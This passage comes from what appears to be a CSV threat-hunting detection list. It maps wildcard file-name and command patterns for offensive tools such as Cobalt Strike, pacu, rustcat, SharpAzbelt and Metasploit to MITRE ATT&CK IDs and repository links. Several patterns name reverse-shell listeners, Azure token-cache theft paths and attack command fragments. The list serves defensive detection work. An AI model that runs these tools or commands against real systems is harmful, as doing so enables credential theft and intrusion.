Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*package_cvs_into_lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*package=impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PackMyPayload.py*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*PackMyPayload-master*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*pacman -S rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*pacu --exec *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --list-modules*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-args=*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-info*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-name *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --session *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --set-regions *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --whoami*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu/core pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu/last_update.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu-master.zip*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*padekgcemlokbadohgkifijomclgjgif*","greyware_tool_keyword","Proxy SwitchyOmega","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*padlock2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*padre -u *http*://*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*padre-master.zip*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*papacat -l -p *","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*ParamPamPam*","offensive_tool_keyword","ParamPamPam","This tool is used for brute discover GET and POST parameters.","T1110 - T1210 - T1211","TA0001 - TA0002 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/ParamPamPam","1","1","N/A","N/A","3","244","60","2022-06-27T11:45:19Z","2018-11-10T08:38:30Z" +"*parrot*security.vdi*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*parrotsec.org/download/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Parrot-security-*.iso*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*parse_aggressor_properties*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*parse_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_nmap_xml*","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*ParseMSALCache*.azure\msal_token_cache.bin*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*PassDetective extract*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*PassDetective-main.*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*passhunt.exe*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" +"*passhunt.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*passhunt.py*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" +"*passivex.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passivex.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passphrase-rule1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-rule2.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-wordlist*","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","992","149","2023-03-16T03:22:53Z","2017-12-05T20:53:13Z" +"*pass-station search tomcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PassTheCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PassTheChallenge.cpp*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PassTheChallenge.exe*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PassTheChallenge.pdb*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PassTheChallenge.sln*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PassTheChallenge.vcxproj*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*passthehashbrowns/BOFMask*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*passware-kit-forensic.sls*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PasswareKitForensic_*_Setup.dmg*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PasswareKitForensic_*_Setup.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*passware-kit-forensic-64bit.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*passwd*john*","greyware_tool_keyword","passwd","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*password = 'tdragon6'*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*Password*Winter2017*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*password_box.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*password_cracker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password_crackers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Password_Cracking.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" 